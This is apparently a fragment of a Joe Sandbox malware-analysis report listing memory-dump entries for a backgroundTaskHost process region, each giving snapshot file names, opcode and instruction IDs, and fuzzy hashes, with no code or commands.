                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 287215f2bd3018f5fca83fc8d5538de90e6734b8fb9016239b4ca10f9b0634ee
                                                                                                              • Instruction ID: 777c36da65e47afd62290f5fb28510345290233bb866a3e61cb8abf356e088ed
                                                                                                              • Opcode Fuzzy Hash: 287215f2bd3018f5fca83fc8d5538de90e6734b8fb9016239b4ca10f9b0634ee
                                                                                                              • Instruction Fuzzy Hash: 14019E31A0D3888FD702DFA4C8546DD7FB0EF02214F1642EBC044DB2A2D6386A44CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e49ac10e7f4e2ed11dc9fc9324b79853f4bb7ec216eec6755fa3f80e90954fac
                                                                                                              • Instruction ID: 1c677b6c084e6ee833412e9a0cee33c9d5420401252d02120334e28be5550b41
                                                                                                              • Opcode Fuzzy Hash: e49ac10e7f4e2ed11dc9fc9324b79853f4bb7ec216eec6755fa3f80e90954fac
                                                                                                              • Instruction Fuzzy Hash: 72F03130B4961F8BEB74EA54CC60BF83661EF50310F0202B5C40DD36B1DE786A818B84
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6529e3a9514a78e7eaa99a9d2aa3612362b048183454ac7ef3d39cdc94b7d26e
                                                                                                              • Instruction ID: 02e184925d010791b46769cdc981dcc46148ee9ec40a33f5ccfa6b001f5e06a3
                                                                                                              • Opcode Fuzzy Hash: 6529e3a9514a78e7eaa99a9d2aa3612362b048183454ac7ef3d39cdc94b7d26e
                                                                                                              • Instruction Fuzzy Hash: 60018F30A0D3898FD711DFA488546DD7FB0EF02304F1542E7C444DB2A6D9385A44C781
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5d9321e5b0ce7b80bcc98df1fb9cdba77fac917103449e8ec2efa1fa7c61ec28
                                                                                                              • Instruction ID: 78426b1bc250ca4da7f8108c065b10aa5cb33d68fec328faccb918beeace66a0
                                                                                                              • Opcode Fuzzy Hash: 5d9321e5b0ce7b80bcc98df1fb9cdba77fac917103449e8ec2efa1fa7c61ec28
                                                                                                              • Instruction Fuzzy Hash: 95E01220F0A51E47FBB49684CC60BA97664EB54310F1542B8D51FA33E1DD38AF459789
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 84da47e8a84d7c7bda6fe4433242c964a2a7c5542f6b8e5b554b8c59c440ec5d
                                                                                                              • Instruction ID: b0e75633ef85d4c039f59fceb8aba3acc69af3247c43fd31e95459d426b5db10
                                                                                                              • Opcode Fuzzy Hash: 84da47e8a84d7c7bda6fe4433242c964a2a7c5542f6b8e5b554b8c59c440ec5d
                                                                                                              • Instruction Fuzzy Hash: 78D0A930229A4F8FCA00B778C88A824BFA0FB4F210BCA10E1E008C75B6C61888998740
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 35a49160e60ee853f605c8054370c066b52b2d658542092c8daf0daae25e67b6
                                                                                                              • Instruction ID: 7de26762e6a141930322089d7dc473d07b8ea8d06e1fc822eaa47d40b2c9af3b
                                                                                                              • Opcode Fuzzy Hash: 35a49160e60ee853f605c8054370c066b52b2d658542092c8daf0daae25e67b6
                                                                                                              • Instruction Fuzzy Hash: 97C00205F5B75F01E46575EA54660ADB9409BC4A25FD21272D50D402B1A84E269901DE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 878d0a290a78d2d185027f1d5c4b1043abd59ccac3c4bd9f31a7ef4262b4e540
                                                                                                              • Instruction ID: 111686620137509a7379213602ecf810e687f1b913866b8007c6b5b0fbe9e8e2
                                                                                                              • Opcode Fuzzy Hash: 878d0a290a78d2d185027f1d5c4b1043abd59ccac3c4bd9f31a7ef4262b4e540
                                                                                                              • Instruction Fuzzy Hash: 85D0C714F0DA5D45F31BE354247477E69126F40258F8505F5D42D565E9CE4C270613D6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a26e15ad939bada4a4d8286c6715bb4a25744d60ea54c1746d662c91e97a4272
                                                                                                              • Instruction ID: c724e0e8e72e16ace30b6a403c41093a20e9779742b5bfbf346b1253903ce476
                                                                                                              • Opcode Fuzzy Hash: a26e15ad939bada4a4d8286c6715bb4a25744d60ea54c1746d662c91e97a4272
                                                                                                              • Instruction Fuzzy Hash: E5C08C306118088FC900E72CC88480436A0FB0D310BC20190E00DCB170E21AACC1C741
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ba664a07dd54359d70fca37f0abd62606f653d5aee111a8cb4b6508814b03422
                                                                                                              • Instruction ID: fb155e6e12141ce06caa6864309f862431da8461515b055142bdfd0e1636c5fe
                                                                                                              • Opcode Fuzzy Hash: ba664a07dd54359d70fca37f0abd62606f653d5aee111a8cb4b6508814b03422
                                                                                                              • Instruction Fuzzy Hash: 54C08C00F18C5A02F319A24424307BF48025F8020CFC104F0E02E867DECC4C5B0222CB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3ab5ce359cc7f79df66d9968f92a2c5830e2d9ffe99e67b19e8a7f70b6af0767
                                                                                                              • Instruction ID: 6881305654c7cbab0a925c6387becd6f9990f21ef2f35e0a2133cb5c006623c9
                                                                                                              • Opcode Fuzzy Hash: 3ab5ce359cc7f79df66d9968f92a2c5830e2d9ffe99e67b19e8a7f70b6af0767
                                                                                                              • Instruction Fuzzy Hash: 62B01200F9750F00E42471FA08A30747C80DF44100FC20270D40C402B1A84D169802CB